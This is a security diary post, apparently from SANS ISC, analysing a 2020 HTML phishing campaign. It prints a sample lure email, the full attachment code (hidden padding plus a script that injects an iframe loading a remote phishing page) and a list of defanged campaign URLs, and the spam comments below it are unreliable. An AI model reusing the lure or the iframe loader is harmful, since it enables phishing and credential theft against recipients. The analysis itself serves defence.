HTML based Phishing Run

Published: 2020-06-15
Last Updated: 2020-06-15 16:14:38 UTC
by Rick Wanner (Version: 1)
2 comment(s)

An intresting phishing run started over the weekend.  At first glance it looks pretty typical...a clumsy email with an attachment with some vital and useful information.  Although I have already seen several different message bodies, this is one sample:

From:Jane Edwards <f.zaffi@ferexpert.it>
Sent:Friday, June 12, 2020 10:16 AM
To:jsoulesneu@creationtech.com
Subject:PROCEDURES

Please find attached a copy of current procedures in place for:

Bank
Concur PO & Expenses processing
Raising Sales Invoices
Raising Purchase Invoices
Recording Consolidated AR & AP at Month End.

I am also working on a Customer spreadsheet (expanding on records held previously ) recording :
Revenue Type
Invoice Frequency
Unit Price
Is a PO required ? if so what type.
I thought that this would be useful if coding and dimensions were included.

Jane Edwards | LedgerController

The attachment in this case was an html file called PROCEDURES.html containing the following:

<div style="display:none;">
aJvpegSAIsclHZNi1NyrFqPLeMlOyw88A56gWJWLi61ta4nysJL5YyCS4SkB5ecmueTM3HurZViJzvLkyWvXTcjcBmmeyvQe4O96jKEUotfdq3tHhaciSnBr5QkPuq3DeeOTvPaXrJIz7gVI3N7xtIuPnRbBzXz8AK8lnJlBaoZiObuY5LWQtEkES9GNNHxCkJ9vhJutBExfSlbmwmGXbSO5ACBocHWCZx8eb8QvqDoXheVG7uqBbIBA5d5Ohgq4R5oun7kyEkHGDZXvP4qRquBq5Gi7dcnjnufmYAtaj27Zb47epI8nYIMxC7zPXmvC7xtiUKFoKqHyxKpaIeRDd9uORRS2bMl7GD2NKYtNdSMIan91RygTE1y7dOAc2Nm7eK23SLzTTdztwUNDS1jMGBBOe4K6xqVyGPEyvfig9v9AAfJra6taEJALimYXaCvCrbWQqoiMScNkBbn9ts6B7U47o2qiqufF9Fizr3bUWPr
<a>
    
PACqCf9SoOoQ97h8rQAEYrnA7B42xxXGW8HMB6ibNI8UNKjnwpn5ZDtynbtbkgvZ1Q3ayDGvHz1psBWvrQFhj2QtOjyzLhZHmh36QiY2S2wzMdfVo7SDJoP
</a>
</div>
<div id="placeholder"></div>

<script id="iframeTemplate" type="text/html">
    <iframe style="width: 100%; height: 100%; border: 0px" src="http://www.wessexgrange.plus.com/7cdmba.html">

    </iframe>
</script>

<script type="text/javascript">
var element,
    html,
    template;

element = document.getElementById("placeholder");
template = document.getElementById("iframeTemplate");
html = template.innerHTML;

element.innerHTML = html;
</script>
<div style="display:none;">
{{RND_TEXT}}
</div>

With assistance from reader Carsten I was also able to get a number of the other URLs used in these messages.

hxxp://bosmafamily.nl/~jet/bzkh.html 
hxxp://flbox.net/87nbtp.html
hxxp://werinussa.net/~eege/1kf2zw.html
hxxp://www.chartercare.plus.com/zlw7.html
hxxp://www.wessexgrange.plus.com/7cdmba.html - Down

There are some detections on the attachments, but Virustotal has almost no detections for the websites. Interestingly Sophos antivirus is listed as "Unrated" on VirusTotal, but my Sophos test machine is catching the attachments as Troj/HTMLDwn-UA.

Running a few of these domains through urlscan.io, it appears very similar and most likely related web pages have been around for at least a week.

So far this is looking like a very clumsy campaign.  But if past history tells us anything these clumsy campaigns will sometimes get better and cause some chaos.  So it is worth keeping an eye on.

If anybody has any more details, they would be greatly appreciated. I would be especially interested in getting my hands on a couple more samples of the attachments. If you have access to some, I would appreciated it if you could zip up a few (password 'infected') and send them to me via the contact form.

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

Keywords: HTML Phishing
2 comment(s)
VMWare Security Advisory - VMSA-2020-0013 - https://www.vmware.com/security/advisories/VMSA-2020-0013.html
ISC Stormcast For Monday, June 15th 2020 https://isc.sans.edu/podcastdetail.html?id=7038

Comments

cwqwqwq

www

Nov 17th 2022
4 months ago

eweew<a href="https://www.seocheckin.com/edu-sites-list/">mashood</a>

EEW

Nov 17th 2022
4 months ago

WQwqwqwq[url=https://www.seocheckin.com/edu-sites-list/]mashood[/url]

qwq

Nov 17th 2022
4 months ago

dwqqqwqwq mashood

mashood

Nov 17th 2022
4 months ago

[https://isc.sans.edu/diary.html](https://isc.sans.edu/diary.html)

isc.sans.edu

Nov 23rd 2022
4 months ago

[https://isc.sans.edu/diary.html | https://isc.sans.edu/diary.html]

isc.sans.edu

Nov 23rd 2022
4 months ago

What's this all about ..?

isc.sans.edu

Dec 3rd 2022
3 months ago

password reveal .

isc.sans.edu

Dec 3rd 2022
3 months ago

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission

isc.sans.edu

Dec 26th 2022
3 months ago

https://thehomestore.com.pk/

isc.sans.edu

Dec 26th 2022
3 months ago

Login here to join the discussion.


Diary Archives